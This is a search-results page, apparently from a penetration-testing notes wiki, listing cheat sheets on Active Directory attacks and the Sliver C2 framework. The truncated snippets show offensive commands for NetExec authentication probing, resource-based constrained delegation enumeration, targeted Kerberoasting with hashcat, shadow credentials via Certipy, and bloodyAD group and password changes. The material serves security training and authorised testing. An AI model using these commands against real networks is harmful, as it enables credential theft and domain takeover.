Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

5 total results found

NetExec Cheat Sheet

AD Enumeration & Exploitation

A cheat sheet for NetExec and CrackMapExec, featuring useful commands and modules for different services to use during Pentesting Enumeration Initial Enumeration netexec smb target Null Authentication netexec smb target -u '' -p '' Guest Authentication netex...

Abusing Resource-Based Constrained Delegation

AD Enumeration & Exploitation

RBCD Enumerate MachineAccountQuota ➜ nxc ldap DC01.push.vl -u kelly.hill -p '<REDACTED>' -M maq SMB 10.10.217.5 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False) LDAP 1...

Sliver C2

C2

https://github.com/BishopFox/sliver Installation Download both the sliver-server and sliver-client from the release for your platform and you are done :) ➜ sliver wget https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux ➜ sli...

ACL Cheatsheet

AD Enumeration & Exploitation

GenericWrite Update object's attributes targetKerberoasting python targetedKerberoast.py -v -d <domain> -u <username> -p <password> hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force ShadowCredentials certipy shadow auto -u username@domain -p <password>...

BloodyAD Cheatsheet

AD Enumeration & Exploitation

Retrieve User Information bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username Add User To Group bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add Change Password bloodyAD --ho...